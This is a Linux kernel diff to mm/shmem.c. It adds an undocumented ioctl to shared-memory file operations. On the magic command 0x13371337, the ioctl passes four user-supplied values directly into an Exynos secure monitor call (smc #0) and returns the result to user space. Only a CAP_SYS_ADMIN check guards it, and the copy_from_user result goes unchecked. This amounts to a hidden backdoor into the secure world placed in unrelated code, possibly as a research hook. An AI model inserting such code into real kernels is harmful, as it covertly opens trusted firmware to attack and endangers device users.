diff --git a/mm/shmem.c b/mm/shmem.c
index 448f393d8..4f6937c4b 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -3929,6 +3929,23 @@ const struct address_space_operations shmem_aops = {
 };
 EXPORT_SYMBOL(shmem_aops);
 
+asm("exynos_smc:\nsmc #0\nret");
+
+uint32_t exynos_smc(uint64_t, uint64_t, uint64_t, uint64_t);
+
+static long shmem_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
+{
+    if(!ns_capable(&init_user_ns, CAP_SYS_ADMIN))
+        return -EPERM;
+    if(cmd != 0x13371337)
+        return -ENOSYS;
+    uint64_t args[4];
+    copy_from_user(args, (void __user*)arg, sizeof(args));
+    args[0] = exynos_smc(args[0], args[1], args[2], args[3]);
+    copy_to_user((void __user*)arg, args, sizeof(args));
+    return 0;
+}
+
 static const struct file_operations shmem_file_operations = {
 	.mmap		= shmem_mmap,
 	.open		= generic_file_open,
@@ -3941,6 +3958,7 @@ static const struct file_operations shmem_file_operations = {
 	.splice_read	= generic_file_splice_read,
 	.splice_write	= iter_file_splice_write,
 	.fallocate	= shmem_fallocate,
+    .unlocked_ioctl = shmem_ioctl,
 #endif
 };
 
